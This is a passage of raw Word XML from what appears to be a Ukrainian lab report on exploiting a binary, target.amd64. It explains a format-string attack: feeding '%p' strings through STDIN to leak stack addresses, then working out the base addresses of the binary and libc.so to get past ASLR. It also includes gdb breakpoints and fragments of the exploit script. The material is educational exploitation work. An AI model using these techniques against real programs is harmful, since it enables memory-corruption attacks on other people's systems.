        <w:t>br *main+84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07DAD0" w14:textId="77777777" w:rsidR="00E95B1B" w:rsidRPr="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00E95B1B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br *main+99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E708CB2" w14:textId="246217B5" w:rsidR="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00E95B1B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br *main+132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CE875" w14:textId="77777777" w:rsidR="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3769966B" w14:textId="1D91D742" w:rsidR="00CD1132" w:rsidRDefault="00CD1132" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть експлойту </w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00081054">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04A75">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D8A80" w14:textId="433F5CED" w:rsidR="007F4CD9" w:rsidRPr="00450671" w:rsidRDefault="008A26FF" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>частина</w:t>
      </w:r>
      <w:r w:rsidR="00E21200" w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (перша ітерація)</w:t>
      </w:r>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0DDCC" w14:textId="160FFA8B" w:rsidR="001B2F97" w:rsidRPr="00CF7C42" w:rsidRDefault="00AE4EF6" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вивести 50 адрес зі стеку, передавши рядок виду "</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>%p  %p</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="007F4CD9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9">
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="007F4CD9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>%p  %p</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="00EA78D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDIN</w:t>
      </w:r>
      <w:r w:rsidR="007F4CD9" w:rsidRPr="00EA78D5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B072FA" w14:textId="18A348F0" w:rsidR="00AE4EF6" w:rsidRPr="00145B65" w:rsidRDefault="00262C9E" w:rsidP="00CD1132">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2. Зчитати</w:t>
      </w:r>
      <w:r w:rsidR="00145B65">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з </w:t>
      </w:r>
      <w:r w:rsidR="00145B65">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDOUT</w:t>
      </w:r>
      <w:r w:rsidR="00FD77B4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ті</w:t>
      </w:r>
      <w:r w:rsidR="0035298A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00772F33">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidR="002C5677">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002C5677">
        <w:t>що ви</w:t>
      </w:r>
      <w:r w:rsidR="002C5677">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тікли</w:t>
      </w:r>
      <w:r w:rsidRPr="00145B65">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C130E" w14:textId="77777777" w:rsidR="000E69EE" w:rsidRPr="000E69EE" w:rsidRDefault="000E69EE" w:rsidP="000E69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69E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0E69E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</w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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ITERATION #1: leak base addresses"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tdin </w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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69EE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%p  " </w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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0E69E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50  </w:t>
      </w:r>
      <w:r w:rsidRPr="000E69EE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rint 64-bit addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="000E69EE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69E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STDIN"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nd_bad_bytes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in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in.</w:t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ecode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t>p.</w:t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riteline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in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log.</w:t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69E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=== STDOUT"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tdout </w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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.</w:t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cv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out.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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ecode</w:t>
      </w:r>
      <w:r w:rsidRPr="000E69E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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A17BAAF" w14:textId="77777777" w:rsidR="00262C9E" w:rsidRDefault="00262C9E" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493C871A" w14:textId="07BFA715" w:rsidR="008A26FF" w:rsidRPr="00450671" w:rsidRDefault="003D2DA3" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>частина</w:t>
      </w:r>
      <w:r w:rsidR="00D2130E" w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (аналіз</w:t>
      </w:r>
      <w:r w:rsidR="0065300C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та 2 ітерація</w:t>
      </w:r>
      <w:r w:rsidR="00D2130E" w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AE4EF6" w:rsidRPr="00450671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D11FB" w14:textId="07E3FE7B" w:rsidR="00055F81" w:rsidRPr="0084374F" w:rsidRDefault="00AA569E" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00CF7C42">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BB05EC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Знайти базов</w:t>
      </w:r>
      <w:r w:rsidR="00055F81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="00BB05EC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес</w:t>
      </w:r>
      <w:r w:rsidR="00E14D28">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00BB05EC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E53C45" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00E53C45" w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E53C45" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00E53C45" w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="006C2FCF" w:rsidRPr="0084374F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084374F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та </w:t>
      </w:r>
      <w:r w:rsidR="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidR="0084374F" w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="0084374F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687485CD" w14:textId="1C8AB3B6" w:rsidR="00AA466E" w:rsidRDefault="006C2FCF" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00465B32">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">итік адреси </w:t>
      </w:r>
      <w:r w:rsidR="00B93A8F" w:rsidRPr="00055F81">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00B93A8F" w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B93A8F" w:rsidRPr="00055F81">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00B93A8F" w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00B93A8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – це 45</w:t>
      </w:r>
      <w:r w:rsidR="00EA3088">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-е</w:t>
      </w:r>
      <w:r w:rsidR="00011038">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> число в </w:t>
      </w:r>
      <w:r w:rsidR="00011038">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDOUT</w:t>
      </w:r>
      <w:r w:rsidR="00EA3088">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, тобто його індекс </w:t>
      </w:r>
      <w:r w:rsidR="00F569E1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00EA3088">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 44</w:t>
      </w:r>
      <w:r w:rsidR="00F569E1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A05033">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Виділено синім</w:t>
      </w:r>
      <w:r w:rsidR="006E2971">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> кольором.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643BAED" w14:textId="6E818DCB" w:rsidR="00D9377A" w:rsidRPr="00EA3088" w:rsidRDefault="00D9377A" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Витік адреси </w:t>
      </w:r>
      <w:r w:rsidR="00AC6F34">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="0084374F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC6F34">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – це 4</w:t>
      </w:r>
      <w:r w:rsidR="00BC6912" w:rsidRPr="00BC6912">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">-е число в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDOUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, тобто його індекс = 4</w:t>
      </w:r>
      <w:r w:rsidR="001C615F" w:rsidRPr="001C615F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Виділено </w:t>
      </w:r>
      <w:r w:rsidR="001C615F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>жовтим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> кольором.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A6F986" w14:textId="194D0E90" w:rsidR="008B24A3" w:rsidRDefault="0020256F" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C34752B" wp14:editId="2CEAA958">
            <wp:extent cx="6645910" cy="1736090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="184146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4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ECE5" w14:textId="1943CBD9" w:rsidR="00BE755E" w:rsidRDefault="004F063D" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00F54D47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">итік адреси </w:t>
      </w:r>
      <w:r w:rsidR="00A104F3" w:rsidRPr="004D5239">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00A104F3" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A104F3" w:rsidRPr="004D5239">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00A104F3" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00A104F3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C50B2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F54D47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60ff1a9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21071330" w14:textId="5463C08B" w:rsidR="007B5C23" w:rsidRDefault="007B5C23" w:rsidP="007B5C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Витік адреси </w:t>
      </w:r>
      <w:r w:rsidR="00103E17">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C50B2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C50B2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00394EB5" w:rsidRPr="00394EB5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2dad90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF484AD" w14:textId="77777777" w:rsidR="007B5C23" w:rsidRPr="007B5C23" w:rsidRDefault="007B5C23" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252CF050" w14:textId="09EA1E9D" w:rsidR="00F54D47" w:rsidRDefault="006E7F5A" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Виведемо </w:t>
      </w:r>
      <w:r w:rsidR="00925DC5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>завантажені модулі:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16F669" w14:textId="11F7DF02" w:rsidR="00925DC5" w:rsidRDefault="00925DC5" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D33006D" wp14:editId="5BD142A4">
            <wp:extent cx="6645910" cy="1343660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="161134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486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02A6" w14:textId="0D9DC77B" w:rsidR="00DE16D5" w:rsidRDefault="004F063D" w:rsidP="00CD1132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Б</w:t>
      </w:r>
      <w:r w:rsidR="00DE16D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">азова адреса </w:t>
      </w:r>
      <w:r w:rsidR="00BE613D" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00BE613D" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE613D" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00BE613D" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00BE613D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00752B84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60fe000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA95D1" w14:textId="0203A911" w:rsidR="006824F1" w:rsidRDefault="006824F1" w:rsidP="006824F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Базова адреса </w:t>
      </w:r>
      <w:r w:rsidR="00945E8D">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidR="00945E8D" w:rsidRPr="00655431">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00945E8D">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="00945E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D86F99" w:rsidRPr="00D86F99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2b1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558B5CE" w14:textId="77777777" w:rsidR="00620539" w:rsidRDefault="00620539" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7B490E" w14:textId="068AFBB9" w:rsidR="00294C0F" w:rsidRDefault="00F84077" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655431">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="00303593">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>фсет</w:t>
      </w:r>
      <w:r w:rsidR="00B05F3A" w:rsidRPr="00655431">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B05F3A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">витіку </w:t>
      </w:r>
      <w:r w:rsidR="00E67B1F" w:rsidRPr="0046767C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00E67B1F" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E67B1F" w:rsidRPr="0046767C">
        <w:rPr>
